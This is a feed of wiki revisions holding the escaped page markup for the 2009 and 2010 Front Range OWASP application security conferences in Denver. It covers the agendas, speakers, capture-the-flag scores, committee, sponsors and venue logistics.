 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 13:50-14:50 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Byrne|&amp;quot;Automated vs. Manual Security: You can't filter The Stupid&amp;quot;]]&lt;br /&gt;
''David Byrne &amp;amp; Charles Henderson, Trustwave''&lt;br /&gt;
&lt;br /&gt;
[http://video.google.com/videoplay?docid=7611144342490803641 Video]&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Damele|&amp;quot;SQL injection: Not only AND 1=1&amp;quot;]]&lt;br /&gt;
''Bernardo Damele Assumpcao Guimaraes, Portcullis Computer Security Ltd.''&lt;br /&gt;
&lt;br /&gt;
[http://video.google.com/videoplay?docid=129190988572738701 Video]&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 14:50-15:00 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Break - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope] &lt;br /&gt;
|-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 15:00-15:50 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Neucom|&amp;quot;Security Policy Management: Best Practices for Web Services and Application Security&amp;quot;]]&lt;br /&gt;
''Ray Neucom, IBM''&lt;br /&gt;
&lt;br /&gt;
[http://video.google.com/videoplay?docid=-4972597638535731442 Video]&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Cornell_Dickson_Abstract|&amp;quot;Vulnerability Management in an Application Security World&amp;quot;]]&lt;br /&gt;
''Dan Cornell &amp;amp; John Dickson, Denim Group''&lt;br /&gt;
&lt;br /&gt;
[http://video.google.com/videoplay?docid=8588268474844052248 Video]&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 15:50-16:30 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:40%; background:#F2F2F2&amp;quot; align=&amp;quot;left&amp;quot; | Panel: Emerging Threats and Enterprise Countermeasures&lt;br /&gt;
Moderator: John Dickson&amp;lt;br/&amp;gt;&lt;br /&gt;
Panelists: Alan Paller, Joey Peloquin, Rohyt Belani, Ed Bellis, Laz, Ray Neucom&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 16:30-17:30 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:40%; background:#F2F2F2&amp;quot; align=&amp;quot;left&amp;quot; | Conference Wrap Up, CTF Awards &amp;amp; Sponsor Raffles - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope] &lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 17:30-21:00 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | OWASP Social Gathering: Dinner and Drinks @ TBD&lt;br /&gt;
 |}&lt;br /&gt;
&lt;br /&gt;
--&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- Back to [https://www.owasp.org/index.php/Front_Range_OWASP_Conference_2009 SnowFROC Home] --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====Capture the Flag (CTF)====&lt;br /&gt;
&lt;br /&gt;
A capture the flag contest was held, with challenges in the categories of network, forensics, and web applications.   The winner received a new iPad.  Second and third place received an iPod shuffle.&lt;br /&gt;
&lt;br /&gt;
Final scores:&lt;br /&gt;
{|&lt;br /&gt;
|Rank||Name||Score||Comments&lt;br /&gt;
|-&lt;br /&gt;
'''|1||mantis||4500||&lt;br /&gt;
|-&lt;br /&gt;
|2||Mathew Rowley||2850||(wuntee)&lt;br /&gt;
|-&lt;br /&gt;
|3||jgimer||2300||&lt;br /&gt;
|-'''&lt;br /&gt;
|4||jsouza||2200||&lt;br /&gt;
|-&lt;br /&gt;
|5||CSURams||1800||&lt;br /&gt;
|-&lt;br /&gt;
|6||quincymagoo||1200||&lt;br /&gt;
|-&lt;br /&gt;
|7||skehoe||700||&lt;br /&gt;
|-&lt;br /&gt;
|8||jtevans||700||&lt;br /&gt;
|-&lt;br /&gt;
|9||igctf||700||&lt;br /&gt;
|-&lt;br /&gt;
|10||kdavis||700||&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Conference Committee====&lt;br /&gt;
&lt;br /&gt;
FROC 2010 Planning Committee Chair: Kathy Thaxton -  kthaxton at owasp dot org&lt;br /&gt;
&lt;br /&gt;
Presentation Selection Committee:&lt;br /&gt;
* Mark Bristow - OWASP Global Conference Committee&lt;br /&gt;
* David Campbell - OWASP Denver&lt;br /&gt;
* Eric Duprey - OWASP Denver&lt;br /&gt;
* Chris Hoff - Cloud Security Alliance&lt;br /&gt;
* Eoin Keary - Chair, OWASP Global Conference Committee&lt;br /&gt;
* Michael Sutton - Cloud Security Alliance&lt;br /&gt;
* Jim Reavis - Cloud Security Alliance&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Colorado Chapter Hosts:&lt;br /&gt;
* David Campbell - OWASP Denver - dcampbell at owasp dot org&lt;br /&gt;
* Eric Duprey - OWASP Denver - eduprey at owasp dot org&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Vendor Exhibition POC: Kathy Thaxton - kthaxton at owasp dot org&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Capture the Flag POC: Eric Duprey - eduprey at owasp dot org&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Conference Sponsors====&lt;br /&gt;
&lt;br /&gt;
[[File:Sponsors.PNG]]&lt;br /&gt;
&lt;br /&gt;
The following organizations are proud sponsors of this conference:&lt;br /&gt;
&amp;lt;!-- &lt;br /&gt;
*Accuvant&lt;br /&gt;
*Breach&lt;br /&gt;
*Business Partner Solutions&lt;br /&gt;
*Denim Group&lt;br /&gt;
*Fishnet Security&lt;br /&gt;
*IBM&lt;br /&gt;
*Imperva&lt;br /&gt;
*Laz&lt;br /&gt;
*Lares&lt;br /&gt;
*Trustwave&lt;br /&gt;
*WhiteHat Security --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
*[http://www.accuvant.com/ Accuvant]&lt;br /&gt;
*[http://www.denimgroup.com/ Denim Group]&lt;br /&gt;
*[http://www.fortify.com/ Fortify Software]&lt;br /&gt;
*[http://www.hosting.com/ Hosting.com]&lt;br /&gt;
*[http://www.whitehatsec.com/home/index.html Whitehat Security]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
If you are interested in sponsoring this OWASP event, please contact Kathy Thaxton at kthaxton at owasp dot org.&lt;br /&gt;
&lt;br /&gt;
Logistics information for sponsors is available [[FROC2010 Sponsor Info|here]]&lt;br /&gt;
&lt;br /&gt;
More information about conference sponsorship is available [[OWASP AppSec Conference Sponsors | here]].&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP AppSec Conference]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Twitter Feed====&lt;br /&gt;
{|&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;border: 1px solid rgb(204, 204, 204); width: 100%; font-size: 95%; color: rgb(0, 0, 0); background-color: rgb(236, 236, 236);&amp;quot; | &lt;br /&gt;
Use the '''[http://search.twitter.com/search?q=%23FROC #FROC]''' hashtag for your tweets (What are [http://hashtags.org/ hashtags]?) &lt;br /&gt;
&lt;br /&gt;
'''@OWASP303 Twitter Feed ([http://twitter.com/OWASP303 follow us on Twitter!])'''&lt;br /&gt;
&amp;lt;twitter&amp;gt;55021150&amp;lt;/twitter&amp;gt; &lt;br /&gt;
&lt;br /&gt;
| style=&amp;quot;width: 110px; font-size: 95%; color: rgb(0, 0, 0);&amp;quot; | &lt;br /&gt;
|} &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- &amp;lt;hr&amp;gt;&lt;br /&gt;
&amp;lt;paypal&amp;gt;Denver&amp;lt;/paypal&amp;gt; --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;headertabs /&amp;gt;&lt;/div&gt;</summary>
		<author><name>Eduprey</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Front_Range_OWASP_Conference_2010&amp;diff=84303</id>
		<title>Front Range OWASP Conference 2010</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Front_Range_OWASP_Conference_2010&amp;diff=84303"/>
				<updated>2010-06-02T15:34:05Z</updated>
		
		<summary type="html">&lt;p&gt;Eduprey: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__NOTOC__ &lt;br /&gt;
&lt;br /&gt;
[http://froc2010.eventbrite.com/ Registration is NOW OPEN]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;!-- Header --&amp;gt;&lt;br /&gt;
====Welcome====  &lt;br /&gt;
[[Image:Froc2010_sm.png|200px]]&lt;br /&gt;
'''Welcome to FROC 2010, the third annual Front Range OWASP Application Security Conference!'''&lt;br /&gt;
&lt;br /&gt;
After successful FROC's in June of 2008, and [http://www.owasp.org/index.php/Front_Range_OWASP_Conference_2009 March of 2009], we are back in Denver, Colorado USA on Wednesday the 2nd of June 2010! &lt;br /&gt;
&lt;br /&gt;
This year we again present a full day, multi-track event, which will provide valuable information for managers and executives as well as developers and engineers.&lt;br /&gt;
&lt;br /&gt;
In 2009, we attracted a packed venue with our great AppSec speakers, and we hope to achieve the same again in 2010.  This year we are organizing the conference with the support of our colleagues at the [http://www.cloudsecurityalliance.org/ Cloud Security Alliance], and will feature an AppSec track as well as a CloudSec/VirtSec track.&lt;br /&gt;
&lt;br /&gt;
====Registration====&lt;br /&gt;
&lt;br /&gt;
[http://froc2010.eventbrite.com Registration is now open!]&lt;br /&gt;
&lt;br /&gt;
Due to the hard work of our organizers and the gracious support of our sponsors, FROC was a free event in 2008 and 2009.  This year, thanks to the generosity of our [http://www.owasp.org/index.php/Front_Range_OWASP_Conference_2010#tab=Conference_Sponsors sponsors] we are offering tickets to the event on a DONATION basis.  Pay whatever you or your company can afford.&lt;br /&gt;
&lt;br /&gt;
Click [http://froc2010.eventbrite.com HERE] to register now.&lt;br /&gt;
&lt;br /&gt;
====Agenda====&lt;br /&gt;
&lt;br /&gt;
==Agenda and Presentations: 2 June 2010==&lt;br /&gt;
&lt;br /&gt;
The agenda follows the successful OWASP conference multi track format, with opening keynotes and presentations in the main auditorium, split tracks in the middle of the day, and closing panel discussions back in the main auditorium.&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;width:80%&amp;quot; border=&amp;quot;0&amp;quot; align=&amp;quot;center&amp;quot;&lt;br /&gt;
 ! colspan=&amp;quot;4&amp;quot; align=&amp;quot;center&amp;quot; style=&amp;quot;background:#4058A0; color:white&amp;quot; | June 2, 2010&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 07:30-08:30 || colspan=&amp;quot;3&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Registration and Continental Breakfast in the Sponsor Expo Room&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 08:30-08:35 || colspan=&amp;quot;3&amp;quot; style=&amp;quot;width:80%; background:#F2F2F2&amp;quot; align=&amp;quot;center&amp;quot; | Welcome to FROC 2010 Conference &lt;br /&gt;
''David Campbell, OWASP Denver''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 08:35-09:35 || colspan=&amp;quot;3&amp;quot; style=&amp;quot;width:80%; background:#F2F2F2&amp;quot; align=&amp;quot;center&amp;quot; | Keynote: [[FROC2010_Abstract_Chess|&amp;quot;Watching Software Run: Software Security Beyond Defect Elimination&amp;quot;]]&lt;br /&gt;
''Brian Chess, Fortify Software''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- [http://video.google.com/videoplay?docid=2875886330538461390 Video] --&amp;gt;&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 09:35-10:00 || colspan=&amp;quot;3&amp;quot; style=&amp;quot;width:80%; background:#F2F2F2&amp;quot; align=&amp;quot;center&amp;quot; | OWASP: State of the Union&lt;br /&gt;
''Tom Brennan, OWASP Board - [http://www.owasp.org/index.php/User:Brennan BIO]''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 10:00-10:20 || colspan=&amp;quot;3&amp;quot; style=&amp;quot;width:80%; background:#F2F2F2&amp;quot; align=&amp;quot;center&amp;quot; | Cloud Security Alliance: State of the Union&lt;br /&gt;
''Randy Barr, Cloud Security Alliance''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 10:20-10:30 || colspan=&amp;quot;3&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Break - Expo - CTF&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | || style=&amp;quot;width:22%; background:#BC857A&amp;quot; | '''AppSec/Technical Track: Room 1'''&lt;br /&gt;
 | style=&amp;quot;width:22%; background:#BCA57A&amp;quot; | '''Cloud/Mobile/Emerging Track: Room 2'''&lt;br /&gt;
 | style=&amp;quot;width:22%; background:#C6E2FF&amp;quot; | '''Management / Exec Track: Room 3'''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 10:30-11:15 || style=&amp;quot;width:22%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | &amp;quot;[[FROC2010_Abstract_Grossman|2010: Web Hacking Odyssey - The Top Hacks of the Year]]&amp;quot;&lt;br /&gt;
''Jeremiah Grossman''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- [http://video.google.com/videoplay?docid=-8396241750899139680 Video] --&amp;gt;&lt;br /&gt;
 | style=&amp;quot;width:22%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[FROC2010_Abstract_McClellan|&amp;quot;Building a Secure, Compliant Cloud for the Enterprise&amp;quot;]]&lt;br /&gt;
''Matt Ferrari, Hosting.com''&lt;br /&gt;
&lt;br /&gt;
 | style=&amp;quot;width:22%; background:#C6E2FF&amp;quot; align=&amp;quot;left&amp;quot; | [[FROC2010_Abstract_Byrne|&amp;quot;Anatomy of a Logic Flaw&amp;quot;]]&lt;br /&gt;
''David Byrne and Charles Henderson, Trustwave''&lt;br /&gt;
&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 11:15-12:00 || style=&amp;quot;width:22%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | &amp;quot;[[FROC2010_Abstract_Zusman|Advanced MITM Techniques for Security Testers]]&amp;quot;&lt;br /&gt;
''Mike Zusman, Raj Umadas and Aaron Rhodes, Intrepidus Group''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- [http://video.google.com/videoplay?docid=-8396241750899139680 Video] --&amp;gt;&lt;br /&gt;
 | style=&amp;quot;width:22%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[FROC2010_Abstract_Nickerson|&amp;quot;YOU are the weakest link&amp;quot;]]&lt;br /&gt;
''Chris Nickerson, Lares Consulting''&lt;br /&gt;
&lt;br /&gt;
 | style=&amp;quot;width:22%; background:#C6E2FF&amp;quot; align=&amp;quot;left&amp;quot; | [[FROC2010_Abstract_Whaley|&amp;quot;Effectively marketing security as a win for both the business and the customer&amp;quot;]]&lt;br /&gt;
''Ben Whaley, Applied Trust Engineering and Jeff Smith, Rally Software''&lt;br /&gt;
&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 12:00-13:00 || colspan=&amp;quot;3&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Lunch - Expo - CTF&lt;br /&gt;
 |-&lt;br /&gt;
&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 13:00-13:50 || style=&amp;quot;width:22%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | &amp;quot;[[FROC2010_Abstract_Wheeler|Vulnerabilities in Secure Code: Now and Beyond]]&amp;quot;&lt;br /&gt;
''Alex Wheeler and Ryan Smith, Accuvant''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- [http://video.google.com/videoplay?docid=-8396241750899139680 Video] --&amp;gt;&lt;br /&gt;
 | style=&amp;quot;width:22%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[FROC2010_Abstract_Roberts|&amp;quot;Real life CSI – Data Mining and Intelligence Gathering for the masses&amp;quot;]]&lt;br /&gt;
''Chris Roberts, Cyopsis''&lt;br /&gt;
&lt;br /&gt;
 | style=&amp;quot;width:22%; background:#C6E2FF&amp;quot; align=&amp;quot;left&amp;quot; | [[FROC2010_Abstract_Dickson|&amp;quot;The Permanent Campaign: Driving a Secure Software Initiative in the Enterprise&amp;quot;]]&lt;br /&gt;
''John Dickson, Denim Group''&lt;br /&gt;
&lt;br /&gt;
 |-&lt;br /&gt;
&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 13:50-14:40 || style=&amp;quot;width:22%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | &amp;quot;[[FROC2010_Abstract_Byrne2|Beware of Serialized GUI Objects Bearing Data]]&amp;quot;&lt;br /&gt;
''David Byrne and Rohini Sulatycki, Trustwave''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- [http://video.google.com/videoplay?docid=-8396241750899139680 Video] --&amp;gt;&lt;br /&gt;
 | style=&amp;quot;width:22%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[FROC2010_Abstract_Zusman2|&amp;quot;What's Old Is New Again: An Overview of Mobile Application Security&amp;quot;]]&lt;br /&gt;
''Zach Lanier and Mike Zusman, Intrepidus Group''&lt;br /&gt;
&lt;br /&gt;
 | style=&amp;quot;width:22%; background:#C6E2FF&amp;quot; align=&amp;quot;left&amp;quot; | [[FROC2010_Abstract_Goldschmidt|&amp;quot;Fundamental Practices and Tools to implement a security development lifecycle&amp;quot;]]&lt;br /&gt;
''Cassio Goldschmidt, Symantec''&lt;br /&gt;
 |-&lt;br /&gt;
&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 14:40-15:00 || colspan=&amp;quot;3&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | BREAK&lt;br /&gt;
 |-&lt;br /&gt;
&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 15:00-15:50 || style=&amp;quot;width:22%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | &amp;quot;[[FROC2010_Abstract_Schmidt|Solving Real-World Problems with an  Enterprise Security API]]&amp;quot;&lt;br /&gt;
''Chris Schmidt''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- [http://video.google.com/videoplay?docid=-8396241750899139680 Video] --&amp;gt;&lt;br /&gt;
 | style=&amp;quot;width:22%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[FROC2010_Abstract_Tucker|&amp;quot;Cloudy with a chance of hack&amp;quot;]]&lt;br /&gt;
''Lars Ewe, Cenzic''&lt;br /&gt;
&lt;br /&gt;
 | style=&amp;quot;width:22%; background:#C6E2FF&amp;quot; align=&amp;quot;left&amp;quot; | [[FROC2010_Abstract_Cornell|&amp;quot;Application Security Program Management with Vulnerability Manager&amp;quot;]]&lt;br /&gt;
''Bryan Beverly, Denim Group''&lt;br /&gt;
&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 15:50-16:30 || colspan=&amp;quot;3&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Panel Discussion: Topic TBD.  Moderator: John Dickson, Denim Group&lt;br /&gt;
 |-&lt;br /&gt;
&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 16:30-17:30 || colspan=&amp;quot;3&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Wrap up, vendor raffles, CTF awards, FREE BEER!&lt;br /&gt;
 |-&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Logistics====&lt;br /&gt;
[[Image:Denver_mountains.JPG]]&lt;br /&gt;
&lt;br /&gt;
This year, the conference will again be held at University of Colorado, Denver.  However, instead of the Tivoli Student Union, this year the event will be hosted at the North Classroom building (Atrium UCD).&lt;br /&gt;
&lt;br /&gt;
[[File:Froc map.GIF|thumb|left]]&lt;br /&gt;
&lt;br /&gt;
[http://maps.google.com/maps?f=q&amp;amp;source=s_q&amp;amp;hl=en&amp;amp;geocode=&amp;amp;q=1200+Larimer+Street,+Denver,+CO&amp;amp;sll=37.0625,-95.677068&amp;amp;sspn=37.188995,62.226563&amp;amp;ie=UTF8&amp;amp;hq=&amp;amp;hnear=1200+Larimer+St,+Denver,+Colorado+80204&amp;amp;z=16&amp;amp;iwloc=A Google Map of the Venue: 1200 Larimer St., Denver CO 80204]&lt;br /&gt;
&lt;br /&gt;
=====Accomodation=====&lt;br /&gt;
OWASP has negotiated discounted rates with the uber-pimpin [http://www.hotelteatro.com/ Hotel Teatro].  Rooms under the FROC rate are $159/night and include courtesy Cadillac Escalade transportation to and from Auraria Campus. To reserve a room, contact Hotel Teatro at +1.303.228.1100 and mention FROC or use the [https://reservations.ihotelier.com/crs/g_reservation.cfm?groupID=464765&amp;amp;hotelID=14708 iHotelier.com link here].&lt;br /&gt;
&lt;br /&gt;
=====How to get to the venue?=====&lt;br /&gt;
&lt;br /&gt;
*By taxi: taxi from the airport to venue is about $50 USD&lt;br /&gt;
&lt;br /&gt;
*From hotel: transport from the conference hotel (Hotel Teatro) by limo is free&lt;br /&gt;
&lt;br /&gt;
*By car: there is plenty of parking at the UCD.  Attendees should park at the Tivoli lot (as in past years) and it is a short walk to the North Classroom buildings.  Parking validation will be provided for registered FROC participants.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- &lt;br /&gt;
====Call for Presentations====&lt;br /&gt;
The [[Front_Range_OWASP_Conference_2010_CFP|call for presentations]] closed 31 March 2010.  We are no longer accepting proposals for presentations.  If you have already submitted a presentation you can, however update your abstract or submit additional information to clarify your proposal. --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- ===[[SnowFROC Tentative Schedule]]=== --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- &lt;br /&gt;
====Agenda and Presentations: 5 March 2009====&lt;br /&gt;
&lt;br /&gt;
The agenda follows the successful OWASP conference two tracks format, with opening keynotes and presentations in the main auditorium, split tracks in the middle of the day, and closing panel discussions back in the main auditorium.&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;width:80%&amp;quot; border=&amp;quot;0&amp;quot; align=&amp;quot;center&amp;quot;&lt;br /&gt;
 ! colspan=&amp;quot;3&amp;quot; align=&amp;quot;center&amp;quot; style=&amp;quot;background:#4058A0; color:white&amp;quot; | March 5, 2009&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 07:30-08:30 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Registration and Continental Breakfast in the Sponsor Expo Room&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 08:30-08:35 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#F2F2F2&amp;quot; align=&amp;quot;center&amp;quot; | Welcome to SnowFROC AppSec 2009 Conference &lt;br /&gt;
''David Campbell, OWASP Denver''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 08:35-09:45 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#F2F2F2&amp;quot; align=&amp;quot;center&amp;quot; | Keynote: [[SnowFROC_Abstract_Grossman|&amp;quot;Top Ten Web Hacking Techniques of 2008: What's possible, not probable&amp;quot;]]&lt;br /&gt;
''Jeremiah Grossman, Whitehat Security''&lt;br /&gt;
&lt;br /&gt;
[http://video.google.com/videoplay?docid=2875886330538461390 Video]&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 09:45-10:15 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#F2F2F2&amp;quot; align=&amp;quot;center&amp;quot; | OWASP State of the Union&lt;br /&gt;
''Tom Brennan, OWASP Board''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 10:15-10:30 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Break - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope]&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | || style=&amp;quot;width:40%; background:#BC857A&amp;quot; | Management / Executive Track: Room 1&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; | Deep Technical Track: Room 2&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 10:30-11:15 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | &amp;quot;[[sfroc_bellis_abstract|Doing More with Less: Automate or Die]]&amp;quot;&lt;br /&gt;
''Ed Bellis, Orbitz''&lt;br /&gt;
&lt;br /&gt;
[http://video.google.com/videoplay?docid=-8396241750899139680 Video]&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Zusman|&amp;quot;Poor Man's Guide to Breaking PKI: Why You Don't Need 200 Playstations&amp;quot;]]&lt;br /&gt;
''Mike Zusman, Intrepidus Group''&lt;br /&gt;
&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 11:15-12:00 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Paller|&amp;quot;A Legal Minimum Standard of Due Care: The CAG and the Top 25 Most Dangerous Programming Errors&amp;quot;]]&lt;br /&gt;
''Alan Paller, SANS''&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Stads|&amp;quot;Adobe Flex, AMF 3 and BlazeDS: An Assessment&amp;quot;]] &lt;br /&gt;
''Kevin Stadmeyer, Trustwave''&lt;br /&gt;
&lt;br /&gt;
[http://video.google.com/videoplay?docid=1629208419122953007 Video]&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 12:00-13:00 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Lunch - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope]&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | || style=&amp;quot;width:40%; background:#BC857A&amp;quot; | Management / Executive Track: Room 1&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; | Deep Technical Track: Room 2&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 13:00-13:50 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Peloquin|&amp;quot;Building an Effective Application Security Program&amp;quot;]]&lt;br /&gt;
''Joey Peloquin, Fishnet Security''&lt;br /&gt;
&lt;br /&gt;
[http://video.google.com/videoplay?docid=-2540122072368010669 Video]&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Belani|&amp;quot;Bad Cocktail: Spear Phishing + Application Hacks&amp;quot;]]&lt;br /&gt;
''Rohyt Belani, Intrepidus Group''&lt;br /&gt;
&lt;br /&gt;
[http://video.google.com/videoplay?docid=3127205451740977427 Video]&lt;br /&gt;
 |-&lt;br /&gt;
